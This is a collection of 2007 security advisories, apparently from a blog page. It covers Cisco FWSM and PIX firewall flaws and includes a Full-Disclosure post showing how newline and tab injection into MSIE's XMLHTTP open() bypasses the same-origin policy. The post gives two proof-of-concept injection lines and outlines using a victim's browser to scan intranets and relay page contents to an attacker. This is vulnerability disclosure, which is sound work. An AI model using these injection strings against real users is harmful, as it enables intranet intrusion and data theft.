Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated.
Solution:Update to version 2.3(4.12) or 3.1(3.24)
Provided and/or discovered by:
Reported by the vendor.
Original Advisory:http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
Cisco PIX Firewall Lets Remote Users Deny Service and Remote Authenticated Users Gain Elevated Privileges
SecurityTracker Alert ID: 1017652
SecurityTracker URL: http://securitytracker.com/id?1017652
CVE Reference:
GENERIC-MAP-NOMATCH Date: Feb 14 2007
Impact: Denial of service via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Cisco Security Advisory
Version(s): prior to 6.3(5.115), 7.0(5.2), 7.1(2.5), and 7.2(2.10)
Description: A vulnerability was reported in Cisco PIX Firewall. A remote authenticated user can obtain administrative privileges on the target system. A remote user can cause denial of service conditions.
A remote user can send specially crafted data to cause the target device to reload under certain conditions.
The vulnerability can be triggered by specific Hypertext Transfer Protocol (HTTP), Session Initiation Protocol (SIP), and Transmission Control Protocol (TCP) traffic.
The vulnerability occurs only when HTTP inspection is enabled via a specific HTTP map in the configuration file, when SIP fixup or inspect is enabled, or when any of the following TCP-based protocols are inspected:
* Computer Telephony Interface Quick Buffer Encoding (CITQBE)
* Distributed Computing Environment/Remote Procedure Call (DCE/RPC)
* Domain Name Service (DNS)
* Extended Simple Mail Transfer Protocol (ESMTP)
* File Transfer Protocol (FTP)
* H.323 protocol
* Hyper Text Transfer Protocol (HTTP)
* Internet Locator Server (ILS)
* Instant Messaging (IM)
* Point-to-Point Tunneling Protocol (PPTP)
* Remote Shell (RSH)
* Real Time Streaming Protocol (RTSP)
* Session Initiation Protocol (SIP)
* Skinny (or Simple) Client Control Protocol (SCCP)
* Simple Mail Transfer Protocol (SMTP)
* Oracle SQL*Net
* Sun RPC
Cisco has assigned Cisco Bug IDs CSCsd75794, CSCse27708, CSCsd97077, and CSCsh12711 to this vulnerability.
When the LOCAL method is used for user authentication, a remote authenticated user that is defined in the local database with a privilege of zero can obtain elevated privileges (to and including level 15, administrative privileges).
Cisco has assigned Cisco Bug IDs CSCsh33287 to this vulnerability.
Impact: A remote user can cause denial of service conditions.
A remote authenticated user can obtain administrative privileges in certain configurations.
Solution: Cisco has issued fixed versions (6.3(5.115), 7.0(5.2), 7.1(2.5), and 7.2(2.10)), available at:
http://www.cisco.com/pcgi-bin/tablebuild.pl/pix
The Cisco advisory is available at: http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
Vendor URL: www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
From: Michal Zalewski (lcamtuf at dione.ids.pl)
Date: Sat Feb 03 2007 - 14:57:01 CST
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
As you probably know, the famous "web 2.0" XMLHttpRequest object allows
client-side web scripts to send nearly arbitrary HTTP requests, and then
freely analyze and manipulate the returned response, including HTTP
headers.
This gives an unprecedented level of control over your browser to the
author of a visited site. For this reason, to prevent various types of
abuse, XMLHttpRequest is restricted to interacting only with the site from
where the script originated, based on protocol, port, and host name
observed.
Unfortunately, due to a programming error, Microsoft's Msxml2.XMLHTTP
ActiveX object that MSIE relies on allows you to bypass this restriction
with the use of - BEHOLD - a highly sophisticated newline-and-tab
technology.
If the victim uses a proxy server (which is very common in corporate
settings), any intranet or Internet site can be interacted with in this
arcane manner:
xmlhttp.open("GET\thttp://dione.ids.pl/\tHTTP/1.0\n\n", "x",true);
Otherwise, only sites co-hosted on the same server or load balancer can be
interacted with - which today can still mean quite a lot, for example
foxyteens.googlepages.com and gmail.com go nicely together. In such a
case, the request is:
xmlhttp.open("GET\t/\tHTTP/1.0\nHost:\tdione.ids.pl\n\n", "x",true);
All contents of the requested page, including cookies, hidden form tokens,
etc, can be then extracted through the use of responseText and
getResponseHeader(), manipulated by the script, and used into subsequent
GET or POST requests.
A test page is available here:
http://lcamtuf.coredump.cx/iexmltest.html
The browser will think it's still talking to the site from which the
script originated, so no session cookies will be sent to that server - but
some interesting activity is still possible: in the true spirit of Web
2.0, this can be trivially turned into an interactive client-side backdoor
proxy that may send shivers down the spines of some corporate security
dudes.
Consider this example: a guy working for company X is sent a link to
hotbrunette25's blog or a really cute video of singing hamsters. While he
is preoccupied with that resource, the creator of a malicious script can
order victim's browser to:
1) Rapidly scan company's internal web services (XMLHttpRequest
supports asynchronous connections and connection notification),
2) Obtain real-time copies of site fronts (raw HTML responseText can be
sent back directly to the attacker through a "legitimate"
XMLHttpRequest).
3) Interact with interesting ones in real-time in a virtually
unrestricted manner (POSTs and GETs with any payloads can be
requested, cookies can be set with setRequestHeader, etc).
Attacker functionality can be esentially implemented as a browser plugin
or a custom proxy and allow what amounts to highly-responsive,
feel-like-you're-there, remote presence - which certainly takes what used
to be blind bounce scanning and XSS to a 2.0 level.
In a setting where no proxy is available, and no elaborate private
infrastructure would be exposed to the attacker, the author of
foxyteens.googlepages.com can of course still use this to send possum
gang-rape spam through GMail from victim's IP, or whatnot - but that's of
course less exciting.
/mz
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Labels: http, Insecurity, Microsoft